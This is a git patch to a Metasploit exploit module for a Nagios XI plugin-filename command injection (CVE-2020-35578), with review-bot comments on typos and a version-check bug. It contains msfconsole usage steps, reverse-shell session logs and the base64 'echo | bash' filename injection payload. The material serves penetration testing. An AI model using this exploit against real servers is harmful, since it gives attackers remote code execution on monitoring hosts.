From 154e237eddfcc90aae9e003b4ef64da95202e951 Mon Sep 17 00:00:00 2001
From: Grant Willcox
Date: Wed, 14 Apr 2021 15:33:42 -0500
Subject: [PATCH] Add in fixes to documentation and module that were covered in the review process
---
 ...s_xi_plugins_filename_authenticated_rce.md | 54 ++++++++++---------
 ...s_xi_plugins_filename_authenticated_rce.rb | 24 +++++----
 2 files changed, 44 insertions(+), 34 deletions(-)
diff --git a/documentation/modules/exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce.md b/documentation/modules/exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce.md
index b998b3c4b5..41abe0254f 100644
--- a/documentation/modules/exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce.md
+++ b/documentation/modules/exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce.md
@@ -1,22 +1,26 @@ ## Vulnerable Application -This module exploits a vulnerability (CVE-2020-35578) in `/admin/monitoringplugins.php` -that enables an authenticated admin user to achieve remote code execution as the `apache` user by uploading a malicious plugin. +This module exploits a command injection vulnerability (CVE-2020-35578) in the `/admin/monitoringplugins.php` +page of Nagios XI versions prior to 5.8.0 when uploading plugins. Successful exploitation allows an authenticated +admin user to achieve remote code execution as the `apache` user by uploading a malicious plugin. The module's `check` method takes advantage of the `Msf::Exploit::Remote::HTTP::NagiosXi` mixin in order to authenticate to the target and -obtain the Nagios XI version number, which is then used to check if the target is Nagios XI 5.3.0-5.7.9 and therefore vulnerable. +obtain the Nagios XI version number, which is then used to check if the target is Nagios XI prior to 5.8.0 and therefore vulnerable. -Next, the module executes a base64 encoded payload via an HTTP POST request to `/admin/monitoringplugins.php`. -This request creates a new plugin entry and a corresponding file in `/usr/local/nagios/libexec/` with the full payload as the name. -Deleting the malicious plugin/file via the web interface failed during testing, so it is automatically deleted when a session spawns. +Next, the module sends a HTTP POST request to `/admin/monitoringplugins.php` containing a file whose filename is set such that it +will escape the existing command that `/admin/monitoringplugins.php` uses on its backend and will instead cause the server to start +executing the attacker's own commands as the `apache` user. + +Once the upload is complete, a new plugin entry will be created along with a corresponding file in `/usr/local/nagios/libexec/` +with the full payload as the file name. 
Deleting the malicious plugin/file via the web interface was not possible during testing, +so it is automatically deleted when a session spawns. The module may fail during the first run. If that happens, try running it again with the same settings. -The module supports `linux/x64` and `linux/x86` payloads (target 0) as well as `cmd/unix` payloads (target 1). +The module supports `linux/x64` and `linux/x86` payloads (target 0) as well as `cmd/unix` payloads (target 1) +and has been successfully tested against Nagios XI versions 5.3.0 and 5.7.5, both running on CentOS 7. +Valid credentials for a Nagios XI admin user are required for exploitation. -Valid credentials for a Nagios XI admin user are required. -This module has been successfully tested against Nagios XI versions 5.3.0 and 5.7.5, both running on CentOS 7. - -Vulnerable software for testing is vavailable [here](https://assets.nagios.com/downloads/nagiosxi/versions.php). +Vulnerable software for testing is available [here](https://assets.nagios.com/downloads/nagiosxi/versions.php). Detailed installation instructions are available [here](https://assets.nagios.com/downloads/nagiosxi/docs/Installing-Nagios-XI-Manually-on-Linux.pdf) and an official video tutorial is available [here](https://www.youtube.com/watch?v=fBWA6t6dJ4I). @@ -25,8 +29,8 @@ and an official video tutorial is available [here](https://www.youtube.com/watch 1. Start msfconsole 2. Do: `use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce` 3. Do: `set RHOSTS [IP]` -4. Do: `set USERNAME [username for the Nagios XI account]` -5. Do: `set PASSWORD [password for the Nagios XI account]` +4. Do: `set USERNAME [username for the Nagios XI account with administrative privileges]` +5. Do: `set PASSWORD [password for the Nagios XI account with administrative privileges]` 6. Do: `set target [target]` 7. Do: `set payload [payload]` 8. Do: `set LHOST [IP]` 
@@ -47,14 +51,14 @@ The username for the Nagios XI account to authenticate with. The default value i ``` Id Name -- ---- -0 Linux +0 Linux (x86/x64) 1 CMD ``` ## Scenarios ### Nagios XI 5.3.0 running on CentOS 7 - Linux target ``` -msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce +msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce [*] Using configured payload linux/x86/meterpreter/reverse_tcp msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set rhosts 192.168.1.16 rhosts => 192.168.1.16 @@ -62,7 +66,7 @@ msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set lhos lhost => 192.168.1.12 msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set password nagiosxi password => nagiosxi -msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options +msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options Module options (exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce): @@ -99,12 +103,12 @@ Exploit target: Id Name -- ---- - 0 Linux + 0 Linux (x86/x64) msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run -[*] Started reverse TCP handler on 192.168.1.12:4444 +[*] Started reverse TCP handler on 192.168.1.12:4444 [*] Executing automatic check (disable AutoCheck to override) [*] Attempting to authenticate to Nagios XI... [+] Successfully authenticated to Nagios XI @@ -125,7 +129,7 @@ Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=4 ``` ### Nagios XI 5.7.5 running on CentOS 7 - CMD target ``` -msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce +msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce [*] Using configured payload linux/x86/meterpreter/reverse_tcp msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set target 1 target => 1 
@@ -135,7 +139,7 @@ msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set lhos lhost => 192.168.1.12 msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set password nagiosadmin password => nagiosadmin -msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options +msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options Module options (exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce): @@ -177,7 +181,7 @@ Exploit target: msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run -[*] Started reverse TCP handler on 192.168.1.12:4444 +[*] Started reverse TCP handler on 192.168.1.12:4444 [*] Executing automatic check (disable AutoCheck to override) [*] Attempting to authenticate to Nagios XI... [+] Successfully authenticated to Nagios XI @@ -192,7 +196,7 @@ uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd) contex ``` ### Nagios XI 5.7.5 running on CentOS 7 (unfinished installation) - Linux target ``` -msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce +msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce [*] Using configured payload linux/x86/meterpreter/reverse_tcp msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set rhosts 192.168.1.14 rhosts => 192.168.1.14 @@ -202,7 +206,7 @@ msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set pass password => nagiosadmin msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set finish_install true finish_install => true -msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options +msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options Module options (exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce): 
@@ -239,12 +243,12 @@ Exploit target: Id Name -- ---- - 0 Linux + 0 Linux (x86/x64) msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run -[*] Started reverse TCP handler on 192.168.1.12:4444 +[*] Started reverse TCP handler on 192.168.1.12:4444 [*] Executing automatic check (disable AutoCheck to override) [*] Attempting to authenticate to Nagios XI... [!] The target seems to be a Nagios XI application that has not been fully installed yet. diff --git a/modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb b/modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb index 4cb440ea45..b97727eba6 100644 --- a/modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb +++ b/modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb @@ -16,11 +16,12 @@ class MetasploitModule < Msf::Exploit::Remote super( update_info( info, - 'Name' => 'Nagios XI 5.3.0-5.7.9 - Plugins Filename Authenticated Remote Code Exection', + 'Name' => 'Nagios XI Prior to 5.8.0 - Plugins Filename Authenticated Remote Code Exection', 'Description' => %q{ - This module exploits a vulnerability in `/admin/monitoringplugins.php` that - enables an authenticated admin user to achieve remote code execution as the - `apache` user by uploading a malicious plugin. + This module exploits a command injection vulnerability (CVE-2020-35578) in the `/admin/monitoringplugins.php` + page of Nagios XI versions prior to 5.8.0 when uploading plugins. Successful exploitation allows + an authenticated admin user to achieve remote code execution as the `apache` user by uploading + a malicious plugin. Valid credentials for a Nagios XI admin user are required. This module has been successfully tested against Nagios versions XI 5.3.0 and 5.7.5, both 
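Review bot: The rewritten 'Name' value on the `+` line still carries the typo `Exection`, so the rename keeps a mistake the commit otherwise set out to clean up; it should read `'Name' => 'Nagios XI Prior to 5.8.0 - Plugins Filename Authenticated Remote Code Execution',`. The unchanged context line just below the new description also has transposed words (`Nagios versions XI 5.3.0`), which is worth fixing in the same pass since the description is already being rewritten. The enclosing `initialize` call starts and ends outside the hunk.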
@@ -42,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Targets' => [
 [
- 'Linux', {
+ 'Linux (x86/x64)', {
 'Arch' => [ARCH_X86, ARCH_X64],
 'Platform' => 'linux',
 # only the wget and perhaps the curl CmdStagers work against a typical Nagios XI host (CentOS 7 minimal) if Nagios XI was installed according to the documentation
@@ -63,7 +64,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'DefaultTarget' => 0,
 'Notes' => {
- 'Stability' => [ CRASH_SAFE, ],
+ 'Stability' => [ CRASH_SAFE ],
 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ],
 'Reliability' => [FIRST_ATTEMPT_FAIL] # payload may not connect back the first time
 }
@@ -140,8 +141,8 @@ class MetasploitModule < Msf::Exploit::Remote
 print_status("Target is Nagios XI with version #{nagios_version}")
 # check if the target is actually vulnerable
- version = Rex::Version.new(nagios_version)
- if version < Rex::Version.new('5.8.0')
+ @version = Rex::Version.new(nagios_version)
+ if @version < Rex::Version.new('5.8.0')
 return CheckCode::Appears
 end
@@ -149,7 +150,8 @@ class MetasploitModule < Msf::Exploit::Remote
 end
 def execute_command(cmd, _opts = {})
- # encode the payload, which is necessary for the exploit to work
+ # Convert the payload to hex ASCII and then Base64 encode the payload.
+ # This is necessary for the exploit to work.
 payload_ascii = Rex::Text.to_hex_ascii(cmd)
 payload_base64 = Rex::Text.encode_base64(payload_ascii)
 payload = ";echo #{payload_base64} | base64 -d | bash;#"
@@ -174,6 +176,10 @@ class MetasploitModule < Msf::Exploit::Remote
 end
 def exploit
+ if @version < Rex::Version.new('5.3.0')
+ fail_with(Failure::NoTarget, "Target is vulnerable but this module currently does not support exploiting target prior to 5.3.0!")
+ end
+
 # visit /admin/monitoringplugins.php in order to get the nsp token required to upload the payload
 res = send_request_cgi({
 'method' => 'GET',
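Review bot: `@version` in the new guard at the top of `exploit` is only assigned inside `check` (the `-140,8` hunk), so when the module runs with AutoCheck disabled, or after a check that returned before the version was parsed, `@version` is nil and `@version < Rex::Version.new('5.3.0')` raises NoMethodError instead of reporting a module failure. Put an explicit guard ahead of the comparison, e.g. `fail_with(Failure::Unknown, 'Nagios XI version is unknown; run check first or enable AutoCheck') if @version.nil?`, or re-run the version lookup at that point rather than relying on state left behind by `check`. The message on the added fail_with line also says "exploiting target prior to" where `targets` is meant, and since it has no interpolation single quotes would match the rest of the file. The body of `exploit` continues past the end of the hunk.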